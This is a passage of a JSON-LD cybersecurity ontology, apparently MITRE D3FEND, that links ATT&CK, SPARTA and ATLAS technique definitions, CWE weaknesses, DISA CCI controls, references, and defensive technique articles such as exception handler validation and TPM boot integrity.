          "@id": "d3f:CCI-002421_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002422_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002423_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002425_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002426_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002460_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002462_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002463_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002464_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002465_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002466_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002467_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002468_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002470_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002475_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002476_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002530_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002531_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002533_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002536_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002546_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002605_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002607_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002613_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002614_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002617_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002618_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002630_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002631_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002661_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002662_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002684_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002688_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002689_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002690_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002691_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002710_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002711_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002712_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002715_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002716_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002717_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002718_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002723_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002724_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002726_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002729_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002740_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002743_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002746_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002748_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002749_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002771_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002824_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002883_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002890_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-002891_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-003014_v2022-04-05"
        },
        {
          "@id": "d3f:CCI-003123_v2022-04-05"
        }
      ],
      "d3f:version": "2022-04-05",
      "rdfs:label": "CCI Catalog v2022-04-05",
      "rdfs:seeAlso": {
        "@id": "https://public.cyber.mil/stigs/cci/"
      }
    },
    {
      "@id": "d3f:T1123",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AudioInputDevice"
      },
      "d3f:attack-id": "T1123",
      "d3f:definition": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)",
      "rdfs:label": "Audio Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Ndfea1e131a45420d8abaaef61bdde168"
        }
      ]
    },
    {
      "@id": "_:Ndfea1e131a45420d8abaaef61bdde168",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AudioInputDevice"
      }
    },
    {
      "@id": "d3f:T1052",
      "@type": "owl:Class",
      "d3f:attack-id": "T1052",
      "d3f:definition": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.",
      "rdfs:label": "Exfiltration Over Physical Medium",
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:controls",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x controls y: x directs or regulates y's operational state, behavior, or function.",
      "rdfs:label": "controls",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-EnhancingNetworkSecurityByPreventingUser-InitiatedMalwareExecution_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/1425209"
      },
      "d3f:kb-abstract": "In this paper, we describe characteristics of the most widely used defense techniques for the blocking of user-initiated malware and why these techniques are insufficient. We then introduce a module verification strategy that will eliminate, or at least severely reduce, this problem by extending the classic \"defense in depth\" network security strategy. We then describe how the augmentation of a standard operating system loader to include references to a database of cryptographic hashes of module executables can be used to implement this strategy. Finally, we describe our efforts towards the creation of a prototype system that implements the module verification strategy.",
      "d3f:kb-author": "John V. Harrison",
      "d3f:kb-mitre-analysis": "This paper describes application whitelisting. New software executable code is compared to a database of allowed software to determine if the new executable code should be loaded and executed. A database of cryptographic hashes is first created for all allowed software executables. Prior to loading any new executable code, a hash is computed and compared against the hash database. If the hash for the new code does not appear in the database, the executable is not loaded and executed.",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:kb-reference-title": "Enhancing Network Security By Preventing User-Initiated Malware Execution",
      "rdfs:label": "Reference - Enhancing Network Security By Preventing User-Initiated Malware Execution - MITRE"
    },
    {
      "@id": "d3f:Reference-LibreNMSDocsOxidizedExtension",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.librenms.org/Extensions/Oxidized/"
      },
      "d3f:kb-abstract": "Integrating LibreNMS with Oxidized brings the following benefits:\n\n* Config viewing: Current, History, and Diffs all under the Configs tab of each device\n* Automatic addition of devices to Oxidized: Including filtering and grouping to ease credential management\n* Configuration searching",
      "d3f:kb-organization": "LibreNMS.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:DiskEncryption"
      },
      "d3f:kb-reference-title": "LibreNMSDocs - Oxidized Extension",
      "rdfs:label": "Reference - Libre NMS - Oxidized Extension"
    },
    {
      "@id": "d3f:Reference-CNNSI-4009",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://rmf.org/wp-content/uploads/2017/10/CNSSI-4009.pdf"
      },
      "d3f:kb-abstract": "The CNSS Glossary is a jointly curated glossary of terms for National Security Systems by DoD, IC, and Civil Agencies (e.g., NIST).",
      "d3f:kb-organization": "Committee on National Security Systems (CNSS)",
      "d3f:kb-reference-of": {
        "@id": "d3f:PhysicalAccessMediation"
      },
      "d3f:kb-reference-title": "Committee on National Security Systems (CNSS) Glossary",
      "rdfs:label": "Reference - Committee on National Security Systems (CNSS) Glossary"
    },
    {
      "@id": "d3f:ExceptionHandlerPointerValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExceptionHandlerPointerValidation"
      ],
      "d3f:d3fend-id": "D3-EHPV",
      "d3f:definition": "Validates that a referenced exception handler pointer is a valid exception handler.",
      "d3f:kb-article": "## How It Works\nWhen a process encounters an exception, it calls an exception handler to deal with the exception.  The method by which this exception handler is determined varies by the operating system.  The exception handler is called, even if it is the default exception handler to terminate the program and display a message that the program stopped working.  In the case that no valid exception handler is found, the program would fail to proceed as normal and could be programmed to terminate.\n\nIn Windows, the address of the exception registration record is stored at the very start of the Thread Information Block; the GS register points to this structure.\n\nThe exception registration record contains two pointers: a pointer to the next exception registration record should this handler fail to handle the exception, and a pointer to the handler.\n\nA buffer overflow can overwrite the saved return pointer with an invalid location to execute memory; this often triggers the exception handler chain, which could also be corrupted by the buffer overflow.  Although Process Exception Handler Validation does not make sure that the exception handler pointer or the code at the exception handler was unaltered, or that the exception handler code is secure, this technique does ensure that the pointer is at least an exception handler that could be called by the program.\n\nWith Process Exception Handler Validation, before the handler is called, it checks the exception handler against a source of valid exception handlers.  If the requested handler is not in this list, other techniques such as those in Process Eviction might be invoked, such as Process Termination to end the current process, or Executable Blacklisting to blacklist the potentially vulnerable or malfunctioning executable.\n\n### Runtime valid exception handler source generation\nThe source of valid exception handlers could be generated at runtime, with the risk of the information that is used to determine the validity of exception handlers being compromised.\n\n### Compile-time\nThe source of valid exception handlers could also be generated at compile time or as a binary patch.  Given the source code, it would be rather straightforward to find the exceptions, as they are pointed in the catch statement of a try-catch clause and the compiler must already generate the code to call exceptions from this.\n\n## Considerations\nIf the program file can be altered by the attacker, then the security could be bypassed by replacing it with any desired program, without even bypassing SEH.\n\nIf the attacker was already able to overwrite the code for a valid exception handler via other functionality in the program, this defense would not prevent arbitrary code execution.\nIf an exception handler recognized as valid is vulnerable, it would be executed anyway.\n\nSafeSEH might be applied only to some executable files or modules, allowing an attacker to call any piece of code as an exception handler in the unprotected modules.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SAFESEH_ImageHasSafeExceptionHandlers_MicrosoftDocs"
      },
      "d3f:synonym": "Exception Handler Validation",
      "d3f:validates": {
        "@id": "d3f:Pointer"
      },
      "rdfs:label": "Exception Handler Pointer Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N074ad4fc4cae48aeb3088ae8f4685431"
        }
      ]
    },
    {
      "@id": "_:N074ad4fc4cae48aeb3088ae8f4685431",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:TA0036",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Exfiltration - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:CWE-469",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-469",
      "d3f:definition": "The product subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk.",
      "rdfs:label": "Use of Pointer Subtraction to Determine Size",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CCI-001305_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        },
        {
          "@id": "d3f:TransferAgentAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs spam protection mechanisms at information system entry and exit points to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001305"
    },
    {
      "@id": "d3f:CWE-1046",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1046",
      "d3f:definition": "The product creates an immutable text string using string concatenation operations.",
      "rdfs:label": "Creation of Immutable Text Using String Concatenation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:OTChangeControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to modify an existing control program.",
      "rdfs:label": "OT Change Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Nabf6ec5c53684489b40d41d818f69e8e"
        },
        {
          "@id": "_:N27bcb7f72e3842c29f8720fd409f07cb"
        }
      ]
    },
    {
      "@id": "_:Nabf6ec5c53684489b40d41d818f69e8e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTChangeControlProgramCommand"
      }
    },
    {
      "@id": "_:N27bcb7f72e3842c29f8720fd409f07cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-001350_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the integrity of audit information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:FileEncryption"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001350"
    },
    {
      "@id": "d3f:CWE-87",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-87",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.",
      "rdfs:label": "Improper Neutralization of Alternate XSS Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:TPMBootIntegrity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TPMBootIntegrity"
      ],
      "d3f:d3fend-id": "D3-TBI",
      "d3f:definition": "Assuring the integrity of a platform by demonstrating that the boot process starts from a trusted combination of hardware and software and continues until the operating system has fully booted and applications are running.  Sometimes called Static Root of Trust Measurement (SRTM).",
      "d3f:kb-article": "## How it works\nDuring the boot process, the BIOS boot block (which, with this defense enabled, is the Core Root of Trust for Measurement) measures boot components (firmware, ROM). The TPM hashes those measurements and stores the hashes in Platform Configuration Registers (PCRs).  Upon a subsequent boot, these hashes are provided to a verifier which compares the stored measurements to the new boot measurements. Integrity of the boot components is assured if they match.\n\nAttestation of the secure boot occurs when a verifying entity requests a Quote which is a concatenation of the requested PCR values, hashed and signed by the TPM's unique RSA key.  The TPM signature is trusted because the private key is stored securely in hardware and never leaves the TPM.\n\n## Considerations\n\n* The TPM does not perform the follow-on actions of acting on the PCR value information; it just provides the PCR stored information.\n* The current version of TPM is 2.0; most existing implementations use TPM 1.2.\n\n## Citations\n[1] [TPM 2.0 Library](https://trustedcomputinggroup.org/resource/tpm-library-specification/)\n[2] [TCG Trusted Attestation Protocol (TAP) Use Cases for TPM Families 1.2 and 2.0 and DICE](https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-TCGTrustedAttestationProtocolUseCasesForTPMFamilies1.2And2.0AndDICE"
        },
        {
          "@id": "d3f:Reference-TrustedAttestationProtocolUseCases"
        },
        {
          "@id": "d3f:Reference-TPM2.0LibrarySpecification_TrustedComputingGroup,Incorporated"
        }
      ],
      "d3f:synonym": [
        "SRTM",
        "Static Root of Trust Measurement"
      ],
      "rdfs:label": "TPM Boot Integrity",
      "rdfs:subClassOf": {
        "@id": "d3f:PlatformHardening"
      }
    },
    {
      "@id": "d3f:AML.T0048.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048.002",
      "d3f:definition": "Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.",
      "rdfs:label": "Societal Harm - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0048"
      },
      "skos:prefLabel": "Societal Harm"
    },
    {
      "@id": "d3f:CCI-002235_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents non-privileged users from executing privileged functions to include disabling, circumventing, or altering implemented security safeguards/countermeasures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002235"
    },
    {
      "@id": "d3f:CWE-80",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-80",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.",
      "rdfs:label": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1188",
      "@type": "owl:Class",
      "d3f:attack-id": "T1188",
      "d3f:definition": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1090.003",
      "rdfs:label": "Multi-hop Proxy",
      "rdfs:seeAlso": {
        "@id": "d3f:T1090.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:OTCreateNewControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to create a control program.",
      "rdfs:label": "OT Create New Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Ne5b1a609daa64f2183fb6bd8a358bbf5"
        },
        {
          "@id": "_:N5fae1c63d30f44c59ae69b7830ad28a2"
        }
      ]
    },
    {
      "@id": "_:Ne5b1a609daa64f2183fb6bd8a358bbf5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N5fae1c63d30f44c59ae69b7830ad28a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTCreateNewControlProgramCommand"
      }
    },
    {
      "@id": "d3f:T1548.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1548.001",
      "d3f:definition": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Setuid and Setgid",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1548"
        },
        {
          "@id": "_:N1513876904894958b6a293cb4bae4c1b"
        }
      ]
    },
    {
      "@id": "_:N1513876904894958b6a293cb4bae4c1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-309",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-309",
      "d3f:definition": "The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.",
      "rdfs:label": "Use of Password System for Primary Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-654"
        }
      ]
    },
    {
      "@id": "d3f:CodeAnalyzer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Code analyzers automatically analyze the composition or behavior of computer programs regarding a property such as correctness, robustness, security, and safety. Program analysis can be performed without executing the program (static program analysis), during runtime (dynamic program analysis) or in a combination of both.",
      "rdfs:label": "Code Analyzer",
      "rdfs:seeAlso": {
        "@id": "dbr:Program_analysis"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": "Program Analysis Tool"
    },
    {
      "@id": "d3f:SystemDependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system dependency indicates a system has an activity, agent, or another system which relies on it in order to be functional.",
      "rdfs:label": "System Dependency",
      "rdfs:seeAlso": [
        {
          "@id": "https://dl.acm.org/doi/10.1145/960116.53994"
        },
        {
          "@id": "https://r-docs.synapse.org/articles/systemDependencies.html"
        },
        {
          "@id": "https://www.ibm.com/docs/en/taddm/7.3.0?topic=model-dependencies-between-resources"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "d3f:M1044",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3-SCF is one possible way to filter library loading.",
      "d3f:related": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "Restrict Library Loading"
    },
    {
      "@id": "d3f:T1213.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.004",
      "d3f:definition": "Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.",
      "rdfs:label": "Customer Relationship Management Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:TA0101",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Command and Control - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:Relational-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RBTL",
      "d3f:definition": "Relational-based Transfer Learning is a subfield of machine learning where knowledge and patterns learned from one domain, characterized by relational and structured data, are transferred to enhance the learning of another related domain. This approach leverages shared concepts, relations, and structures across domains, taking advantage of the rich semantic knowledge within relational data to improve learning performance in the target task.",
      "d3f:kb-article": "## References\nV7 Labs. (n.d.). Transfer Learning Guide. [Link](https://www.v7labs.com/blog/transfer-learning-guide#:~:text=Relational%2Dbased%20transfer%20learning%20approaches,domain%20to%20the%20target%20domain).",
      "rdfs:label": "Relational-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-233",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-233",
      "d3f:definition": "The product does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined.",
      "rdfs:label": "Improper Handling of Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:IA-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.03",
      "d3f:definition": "In this variant, the attacker employs a capture mechanism (robotic arm, grappling fixture, magnetic or mechanical coupler) to establish physical contact without full docking. Once grappled, covers can be manipulated, temporary umbilicals attached, or exposed test points engaged; if design provisions exist (service ports, checkout connectors, external debug pads), these become direct pathways to device programming interfaces (e.g., JTAG/SWD/UART), mass-storage access, or maintenance command sets. Grappling also enables precise attitude control relative to the target, allowing contact-based sensors to read buses inductively or capacitively, or to inject signals onto harness segments reachable from the exterior. Initial access arises when a maintenance or debug path, normally latent in flight, is electrically or logically completed by the grappled connection, allowing authentication-bypassing actions such as boot-mode strapping, image replacement, or scripted command ingress. The operation demands accurate geometry, approach constraints, and fixture knowledge, but yields a transient, high-privilege bridge tailored for short, decisive actions that leave minimal on-orbit RF signature.",
      "rdfs:label": "Proximity Grappling - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Proximity Grappling"
    },
    {
      "@id": "d3f:start",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "start",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:SystemCallEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user-space process requests a service or resource from the operating system kernel through a system call interface, enabling controlled interactions with hardware or kernel-level operations.",
      "rdfs:label": "System Call Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelEvent"
        },
        {
          "@id": "_:N6ba41464483c459b906317c8aae49ef4"
        }
      ]
    },
    {
      "@id": "_:N6ba41464483c459b906317c8aae49ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-530",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-530",
      "d3f:definition": "A backup file is stored in a directory or archive that is made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Backup File to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:VarianceReduction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-VR",
      "d3f:definition": "Leverages a well-known result from statistical learning and decomposes the model error into a data noise term, a model bias term and a model variance term. As the noise term only depends on the data and the bias is induced by the choice of model, any reduction in the error can only come from the variance term.",
      "d3f:kb-article": "## References\nIntro to Active Learning. inovex Blog.  [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Variance Reduction",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:T1610",
      "@type": "owl:Class",
      "d3f:attack-id": "T1610",
      "d3f:definition": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)",
      "rdfs:label": "Deploy Container",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:DE-0003.03",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.03",
      "d3f:definition": "By toggling receiver enable states (per-receiver, per-antenna, or per-band), the adversary creates deliberate “quiet windows” in which outside intervention cannot arrive. Turning a command receiver off, or shifting to a configuration that ignores the primary path, allows queued actions or onboard procedures to run without interruption, while operators perceive a transient loss of commandability consistent with geometry or environment. Brief, well-timed toggles can also desynchronize counters and handovers, complicating reconstruction of what occurred.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Command Receiver On/Off Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/03/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Naaacfb42e138489ebcd7190ec7be89ca"
        }
      ],
      "skos:prefLabel": "Command Receiver On/Off Mode"
    },
    {
      "@id": "_:Naaacfb42e138489ebcd7190ec7be89ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:T1484",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
